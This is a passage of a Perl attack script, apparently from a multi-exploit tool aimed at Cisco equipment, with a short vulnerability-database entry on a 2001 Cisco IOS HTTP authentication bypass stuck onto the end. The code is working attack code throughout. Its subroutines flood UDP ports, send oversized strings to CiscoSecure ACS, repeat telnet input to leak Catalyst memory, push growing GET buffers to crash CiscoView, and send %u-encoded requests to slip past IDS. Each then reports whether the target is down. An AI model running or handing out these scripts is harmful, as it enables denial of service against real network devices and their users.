
  socket(SS, PF_INET, SOCK_DGRAM, 17);
  my $iaddr = inet_aton("$ip");

  for ($i=0; $i<10000; $i++)
  { send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

  printf "\nPackets sent ...\n";
  sleep(2);
  printf "Please enter a server's open port : ";
  $ports = <STDIN>;
  chomp $ports;
  printf "\nNow checking server status ...\n";
  sleep(2);

  socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
  my $dest = sockaddr_in ($ports, inet_aton($ip));
  connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

  printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
  exit(1);
}

sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
  my $ip = $host;
  my $vln = "%%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $vln x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $ip,
                                     PeerPort => "(2002)",
                                    ) || die "Unable to connect to $ip:2002 ...\n\n";

  $sockd->autoflush(1);
  print $sockd "$string" . $shc;
  while (<$sockd>){ print }
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$ip,
                                      PeerPort=>"(2002)",);
                                      unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  exit(1);
}

sub cisco11 # Cisco Catalyst Memory Leak Vulnerability
{
  my $serv = $host;
  my $rep = "";
  my $str = "AAA\n";

  print "\nInput the number of repetitions : ";
  $rep = <STDIN>;
  chomp $rep;
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     Proto => "tcp")
                                     || die "No telnet server detected on $serv ...\n\n";

  for ($k=0; $k<=$rep; $k++) {
                                print $sockd "$str";
                                sleep(1);
                                print $sockd "$str";
                                sleep(1);
                             }
  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);
  
  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"(23)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n";
  close($sockd2);
  exit(1);
}

sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $l =100;
  my $vuln = "";
  my $long = "A" x $l;

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  for ($k=0; $k<=50; $k++) {
                              my $vuln = "GET " . $long . " HTTP/1.0\n\n";
                              print $sockd "$vuln\n\n";
                              sleep(1);
                              $l = $l + 100;
                           }

  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n";
  close($sockd2);
  exit(1);
}

sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)
{
  my $serv = $host;
  my $vuln = "GET %u002F HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  print("Please verify if directory has been listed ...\n\n");
  print("Server response :\n");
  sleep(2);
  while (<$sockd>){ print }
  exit(1);
}

sub cisco14 # Cisco IOS HTTP server DoS Vulnerability
{
  my $serv = $host;
  my $vuln = "GET /TEST?/ HTTP/1.0";

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};

  print $sockd "$vuln\n\n";
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}


- Vulnerability information

578
Cisco IOS HTTP Unauthorized Administrative Access

- Vulnerability description

IOS contains a flaw that may allow a malicious user to bypass authentication. The issue is triggered when an attacker sends a specially crafted URL to the HTTP server. It is possible that the flaw may allow an attacker to gain administrative privileges resulting in a loss of confidentiality, integrity, and/or availability.

- Timeline

2001-06-27 2001-06-27
2001-07-02 Unknown

- Solution

Cisco has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete